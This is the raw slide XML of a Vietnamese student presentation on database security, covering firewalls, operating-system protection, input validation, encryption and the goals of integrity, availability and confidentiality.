                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>và ngăn chặn các cuộc tấn công từ phía internet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t> đến cơ sở dữ liệu</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600">
                <a:effectLst/>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0" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{743B8180-4FA5-96D7-6D55-99E58E266C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8358210" y="8801100"/>
            <a:ext cx="709589" cy="22971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24</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1696D1A9-9583-9DF4-EC66-DD3AFDDC154E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20456131">
            <a:off x="431898" y="1131783"/>
            <a:ext cx="1863526" cy="1557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3820461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4154984"/>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 bài thuyết trình của nhóm 6.</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xmlns="" id="{467B3D97-0BC9-3AB6-42B5-007634F62ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2324100"/>
            <a:ext cx="16802100" cy="6712434"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{71F0E821-4B67-3DC4-47AE-3C2B054BE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38" y="0"/>
            <a:ext cx="9921961" cy="47931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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2052" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{41AA71BB-BDCB-6D1A-4D6E-D1E04D56B54A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2093805882"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1254026" y="5047342"/>
          <a:ext cx="15590098" cy="36688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xmlns="" id="{12FB7D77-AAD9-C0F8-5D6B-4733E024F060}"/>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1" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D7EC53F1-D025-D3B1-74A9-64EB96B92CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8358211" y="992187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3</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3400294755"/>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324100"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="0" y="49134"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="49134"/>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3023569" cy="1732469"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marR="26035" algn="just">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="25"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" i="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Abstract</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" i="1">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a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Bài báo trình bày về cấu hình và phát triển cơ sở dữ liệu, tập trung vào vấn đề bảo mật khi kết nối với internet. Nói về các biện pháp phòng ngừa bảo mật ở các cấp độ khác nhau, như mạng (Tường lửa), hệ điều hành, và ứng dụng khách (Kiểm tra dữ liệu đầu vào). Nhấn mạnh tầm quan trọng của việc bảo vệ cơ sở dữ liệu để tránh các vấn đề bảo mật phổ biến. Mục tiêu là giảm lỗ hổng trong hệ thống phần mềm. Phương pháp kiểm thử bao gồm xem xét mã và đánh giá lỗ hổng, nhằm đảm bảo mức độ bảo vệ cao.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="36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0" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{743B8180-4FA5-96D7-6D55-99E58E266C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8358211" y="8665686"/>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4</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1696D1A9-9583-9DF4-EC66-DD3AFDDC154E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20456131">
            <a:off x="431898" y="1131783"/>
            <a:ext cx="1863526" cy="1557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01" y="2324100"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="0" y="49134"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="49134"/>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51136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3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Trong quá trình phát triển phần mềm, bảo mật thường được coi là một yếu tố phụ và ít khi được ưu tiên hàng đầu</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Tuy </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>nhiên, việc xử lý lỗ hổng bảo mật mà không có kế hoạch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>cụ thể</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>ỗ hổng bảo mật có thể phụ thuộc vào cách mà hệ thống được triển khai</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="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cận bảo mật cơ sở dữ liệu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{743B8180-4FA5-96D7-6D55-99E58E266C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8131979" y="8671409"/>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5</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404906369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xmlns=""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xmlns=""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xmlns=""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xmlns=""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32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xmlns="" id="{5D2A80CE-B053-D19C-EB1A-846560B6C626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="13064159" cy="5139869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khái niệm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="28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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mục tiêu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>đảm bảo tính toàn vẹn, sẵn sàng và bảo mật của thông tin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="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Đồng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thời ngăn chặn các cuộc tấn công, truy cập trái phép và sử dụng sai mục đích. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRP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xem xét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bảo mật</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dữ liệu</a:t>
            </a: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an ninh mạng (LAN và / hoặc WAN)</a:t>
            </a:r>
            <a:r>
              <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indent="-4572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 nhiên, để bảo vệ dữ liệu và tránh các: mối nguy vật lý, lỗi phần cứng, lỗi phần mềm,… Mọi công ty đều phải có chính sách bảo mật dữ liệu. </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xmlns="" id="{83F824C0-316B-666E-9A51-67ACA35CD1C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1616801">
            <a:off x="14945504" y="2056594"/>
            <a:ext cx="2860223" cy="3271303"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5CDEF421-7C55-FC61-7C43-1DD23FC49658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7783011" y="9105505"/>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6</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{97219A98-475B-0404-6F11-B6A08886E403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13223110">
            <a:off x="14138621" y="6784915"/>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r>
              <a:rPr lang="en-US"/>
              <a:t>l</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34700628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xmlns=""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xmlns=""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xmlns=""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xmlns="" id="{30DBEA8F-74ED-0927-D140-75867E125AE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="246016"/>
              <a:ext cx="1806232" cy="269547"/>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32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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7741500C-4F4C-D8D2-344E-87913951715B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="12344400" cy="3693319"/>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3200" kern="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</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32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32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32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3200" kern="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Bef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" ker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32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dùng.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1E89B08B-D2F9-BFBF-A808-CF49B901244D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7859741" y="9045052"/>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7</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164984771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xmlns=""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xmlns="" id="{31683666-1CE6-80A3-054B-B739FEA0DE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742950" y="2698266"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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xmlns="" id="{0063E101-B661-1C28-E938-C4D4FC6BDBE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1453558" y="3439524"/>
            <a:ext cx="7315200" cy="474347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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Mỗi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mục dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>liệu gửi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>từ máy khách đến máy chủ đều được </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>kiểm tra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lọc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> trước khi đến cơ sở dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>liệu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>liệu trong cơ sở dữ liệu có thể được mã hóa và ngay cả trong trường hợp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xâm nhập, kẻ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tấn công không thể sử dụng dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>liệu đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="320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endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C3269EF9-D048-6246-16D1-8A89F4779294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2740628"/>
            <a:ext cx="10177264" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyP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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4D1F911C-5081-56CF-17CD-CED55C89A48C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163051" y="3478522"/>
            <a:ext cx="7981948" cy="3531288"/>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3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dữ liệu có thể được chia thành </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
